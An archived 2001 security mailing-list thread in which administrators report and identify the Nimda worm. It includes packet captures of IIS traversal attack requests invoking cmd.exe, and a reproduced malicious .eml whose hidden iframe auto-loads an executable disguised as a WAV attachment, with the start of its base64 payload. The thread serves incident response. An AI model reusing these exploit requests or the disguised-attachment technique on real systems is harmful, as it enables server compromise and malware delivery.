RE: New worm? 'readme.eml'

From: JKruser (jkruser@adelphia.net)
Date: 09/18/01


From: "JKruser" <jkruser@adelphia.net>
To: "Pedro Miller Rabinovitch" <pedro@cipher.com.br>, <forensics@securityfocus.com>
Subject: RE: New worm? 'readme.eml'
Date: Tue, 18 Sep 2001 12:54:31 -0400
Message-ID: <NDBBJDPCMMJOCGOGCHPHKEKKEGAA.jkruser@adelphia.net>

09/18/01
Virus Alert

Be on the alert for an email borne virus with the following characteristics:

Name of attachment: README.EXE

Description:
This is the preliminary information known at this time.
There is a new mass-mailing worm that utilizes email to propagate itself.
The threat arrives as readme.exe in an email.

In addition, the worm sends out probes to IIS servers attempting to spread
by using the Unicode Web Traversal exploit similar to W32.BlueCode.Worm.
Compromised servers may display a webpage prompting a visitor to download an
Outlook file which contains the worm as an attachment.

Also, the worm will create an open network share allowing access to the
system. The worm will also attempt to spread via open network shares.

For more information refer to:
(Aliases: W32.Nimda.A@mm, W32/Nimda-A)

Sophos:
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html

Symantec:
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html

Claymore
the unprofound

-----Original Message-----
From: Pedro Miller Rabinovitch [mailto:pedro@cipher.com.br]
Sent: Tuesday, September 18, 2001 11:14 AM
To: forensics@securityfocus.com
Cc: Cory McIntire; focus-ms@securityfocus.com;
focus-ids@securityfocus.com
Subject: New worm? 'readme.eml'

Hi,

   is this CodeBlue? Some new worm? Or just one I hadn't heard about?
It uses double-encoding exploits, and propagates both by adding
javascript to the main page and by probing other systems...

Report:

Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date Time D Source IP Sport Dport P
01Sep18 11:20 T 200.192.226.40 3933 80 T
01Sep18 11:20 T 200.192.226.40 3767 80 T
01Sep18 11:20 T 200.192.226.40 3572 80 T

  SOURCE: 200.192.226.40

  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx
E...ba@.w..=...(xxxx
  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00
...P{....~.NP."8.z..
  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET
/_vti_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection:
close....

  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx
E....c@.w..:...(xxxx
  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00
...P{....O..P."8....
  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET
/_mem_bin/..%255
  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35
c../..%255c../..%255
  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63
c../winnt/system32/c
  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31
md.exe?/c+dir HTTP/1
  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e
.0..Host: www..Connn
  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection:
close....

  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx
E...9e@.w.?....(xxxx
  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00
.].P{."6.LZ.P."8.6..
  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET
/msadc/..%255c..
  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e
/..%255c../..%255c/.
  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e
.%c1%1c../..%c1%1c..
  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79
/..%c1%1c../winnt/sy
  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69
stem32/cmd.exe?/c+di
  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r
HTTP/1.0..Host: ww
  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73
w..Connnection: clos
  65 0d 0a 0d 0a e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I
saw the normal web page for the institution, plus a pop-up window for
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as
follows:

MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,

        Pedro.

--
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br

----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Nimda Worm Alert - What Ive done so far.
    ... Download/Install URL Scan for www servers. ... A new worm named W32/Nimda-A (known aliases are Nimda, Minda, Concept ... Microsoft IIS 4.0/5.0 File Permission Canonicalization Vulnerability ...
    (Focus-Microsoft)
  • Re: ** Sobig.F attack expected 3:00pm to 6:00pm EST today [Friday 22]
    ... computers that are currently infected with the Sobig.F worm ... > infected device possibly involving the "master servers," the others opened ... > This press release comes from F-Secure. ... > has been added to our lists without your consent, ...
    (microsoft.public.security)
  • Re: ** Sobig.F attack expected 3:00pm to 6:00pm EST today [Friday 22]
    ... computers that are currently infected with the Sobig.F worm ... > infected device possibly involving the "master servers," the others opened ... > This press release comes from F-Secure. ... > has been added to our lists without your consent, ...
    (microsoft.public.inetserver.iis.security)
  • Re: ** Sobig.F attack expected 3:00pm to 6:00pm EST today [Friday 22]
    ... computers that are currently infected with the Sobig.F worm ... > infected device possibly involving the "master servers," the others opened ... > This press release comes from F-Secure. ... > has been added to our lists without your consent, ...
    (microsoft.public.windowsxp.security_admin)
  • RE: New "concept" virus/worm?
    ... The W32.Nimda.A@mm worm infects IIS servers by exploiting the 'MS IIS/PWS ... opening the attachment will infect the machine. ... The virus comes at a time of heightened sensitivity to Internet attack. ...
    (Vuln-Dev)